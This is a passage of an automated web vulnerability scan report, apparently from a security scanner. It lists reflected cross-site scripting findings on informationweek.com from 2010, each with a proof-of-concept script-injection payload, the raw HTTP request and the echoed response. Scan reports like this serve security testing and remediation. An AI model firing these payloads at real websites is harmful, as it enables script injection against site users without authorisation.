The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949fb"><script>alert(1)</script>ca1d846fb33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet949fb"><script>alert(1)</script>ca1d846fb33/social_network/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:26 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:26 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=JMMYYDFYBD4EDQE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32198
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/internet949fb"><script>alert(1)</script>ca1d846fb33/s;kvarticleid=;kvauthor=;loc=300;grp=57020140" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63df4"><a%20b%3dc>77a552403ed was submitted in the REST URL parameter 3. This input was echoed as 63df4"><a b=c>77a552403ed in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/internet/social_network63df4"><a%20b%3dc>77a552403ed/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:32 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:32 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=4GQ0HLOCNTVDFQE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32629
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_HP_Welcome_Ad_1x1;key=/news/internet/social_network63df4"><a b=c>77a552403ed/show;kvarticleid=;kvauthor=;loc=300;grp=683946190" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7ea2'-alert(1)-'310a28be72a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/social_networkb7ea2'-alert(1)-'310a28be72a/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:38 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:38 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=J0DVYBFWA2OHLQE1GHOSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32615
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... '+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_HP_Welcome_Ad_1x1;key=/news/internet/social_networkb7ea2'-alert(1)-'310a28be72a/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=103652641;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2eee4'%3balert(1)//fa6060e2042 was submitted in the articleID parameter. This input was echoed as 2eee4';alert(1)//fa6060e2042 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/social_network/showArticle.jhtml?articleID=2172011672eee4'%3balert(1)//fa6060e2042&queryText=Facebook%20Expands%20Security%20Tools%20While%20Combatting%20Phishing%20Attack HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:45 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:45 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=DWG2AXTXUUF2HQE1GHOSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 33578
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_HP_Welcome_Ad_1x1;key=2172011672eee4';alert(1)//fa6060e2042+/news/internet/social_network/showArticle/dhandler;kvarticleid=2172011672eee4';alert(1)//fa6060e2042;kvauthor=;loc=100;target=_blank;grp=386772934;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f935f"><script>alert(1)</script>e0cc4d00a4e was submitted in the articleID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/social_network/showArticle.jhtml?articleID=217201167f935f"><script>alert(1)</script>e0cc4d00a4e&queryText=Facebook%20Expands%20Security%20Tools%20While%20Combatting%20Phishing%20Attack HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:44 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:44 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=M12E222LNAT2FQE1GHPCKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 34003
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <link rel="canonical" href="http://www.informationweek.com/news/internet/social_network/showArticle.jhtml?articleID=217201167f935f"><script>alert(1)</script>e0cc4d00a4e"/> ...[SNIP]...
1.63. http://www.informationweek.com/news/internet/social_network/showArticle.jhtml [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.informationweek.com
Path: /news/internet/social_network/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7350a"><script>alert(1)</script>4e551852865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/social_network/showArticle.jhtml?articleID=217201167&queryText=Facebook%20Expands%20Security%20Tools%20While%20Combatting%20Phishing%20Attack&7350a"><script>alert(1)</script>4e551852865=1 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:15:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=THEILS00DJE3ZQE1GHPCKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 80036
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <input type="hidden" value="/news/internet/social_network/showArticle.jhtml?articleID=217201167&queryText=Facebook%20Expands%20Security%20Tools%20While%20Combatting%20Phishing%20Attack&7350a"><script>alert(1)</script>4e551852865=1#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" /> ...[SNIP]...
The value of the queryText request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33b2a"><script>alert(1)</script>6526c1d54f8 was submitted in the queryText parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/social_network/showArticle.jhtml?articleID=217201167&queryText=Facebook%20Expands%20Security%20Tools%20While%20Combatting%20Phishing%20Attack33b2a"><script>alert(1)</script>6526c1d54f8 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:15:47 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:47 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=MUAF22MIYTCWHQE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 79934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <input type="hidden" value="/news/internet/social_network/showArticle.jhtml?articleID=217201167&queryText=Facebook%20Expands%20Security%20Tools%20While%20Combatting%20Phishing%20Attack33b2a"><script>alert(1)</script>6526c1d54f8#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e14fa'-alert(1)-'d421d37563e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newse14fa'-alert(1)-'d421d37563e/security/government/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:24 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:24 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=ARU5XONRGKKA1QE1GHPCKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32631
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/newse14fa'-alert(1)-'d421d37563e/security/government/showA;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=810713290;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70549"><script>alert(1)</script>142a62d52b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news70549"><script>alert(1)</script>142a62d52b3/security/government/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:23 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:23 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=TNOOY3K2DLFQ5QE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32681
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/news70549"><script>alert(1)</script>142a62d52b3/security/g;kvarticleid=;kvauthor=;loc=300;grp=368636804" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3919d"><script>alert(1)</script>8f263f0f267 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security3919d"><script>alert(1)</script>8f263f0f267/government/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:25 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:25 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=XJ1CVXBYV1QC5QE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32709
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_HP_Welcome_Ad_1x1;key=/news/security3919d"><script>alert(1)</script>8f263f0f267/g;kvarticleid=;kvauthor=;loc=300;grp=637576285" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd736'-alert(1)-'3cb2bafec0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/securityfd736'-alert(1)-'3cb2bafec0b/government/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:26 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:26 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=TGIVKGCASLX13QE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32659
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_HP_Welcome_Ad_1x1;key=/news/securityfd736'-alert(1)-'3cb2bafec0b/government/showA;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=137047912;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ba84'-alert(1)-'9c2ff2eaa78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/security/government9ba84'-alert(1)-'9c2ff2eaa78/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:35 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:35 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=BHG1AQLSM2XCNQE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32607
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/news/security/government9ba84'-alert(1)-'9c2ff2eaa78/showA;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=452934421;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31191"><a%20b%3dc>e3debf56268 was submitted in the REST URL parameter 3. This input was echoed as 31191"><a b=c>e3debf56268 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/security/government31191"><a%20b%3dc>e3debf56268/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:30 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:30 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=NI5WDPYF1SPANQE1GHPCKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32597
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/news/security/government31191"><a b=c>e3debf56268/showArti;kvarticleid=;kvauthor=;loc=300;grp=1947521" target="_blank"> ...[SNIP]...
The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1fe2"><script>alert(1)</script>44f2482f07b was submitted in the articleID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security/government/showArticle.jhtml?articleID=210605649b1fe2"><script>alert(1)</script>44f2482f07b HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:44 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:44 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=2XYZBGMCHJOTNQE1GHRSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 33943
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <link rel="canonical" href="http://www.informationweek.com/news/security/government/showArticle.jhtml?articleID=210605649b1fe2"><script>alert(1)</script>44f2482f07b"/> ...[SNIP]...
The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db05f'%3balert(1)//e4aa56f47d was submitted in the articleID parameter. This input was echoed as db05f';alert(1)//e4aa56f47d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/security/government/showArticle.jhtml?articleID=210605649db05f'%3balert(1)//e4aa56f47d HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:45 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:45 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=DWMLHNPRGMWVLQE1GHOSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 33491
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=210605649db05f';alert(1)//e4aa56f47d+/news/security/government/showArticle/dhandler;kvarticleid=210605649db05f';alert(1)//e4aa56f47d;kvauthor=;loc=100;target=_blank;grp=422746956;misc='+new Date().getTime()+'"> ...[SNIP]...
1.73. http://www.informationweek.com/news/security/government/showArticle.jhtml [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.informationweek.com
Path: /news/security/government/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa7f9"><script>alert(1)</script>ee8421fdee2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/security/government/showArticle.jhtml?articleID=210605649&fa7f9"><script>alert(1)</script>ee8421fdee2=1 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:15:47 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:47 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=ZHZJWB4GKN4LTQE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 82114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <input type="hidden" value="/news/security/government/showArticle.jhtml?articleID=210605649&fa7f9"><script>alert(1)</script>ee8421fdee2=1#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df1dc'-alert(1)-'74b563b67f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsdf1dc'-alert(1)-'74b563b67f7/software/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
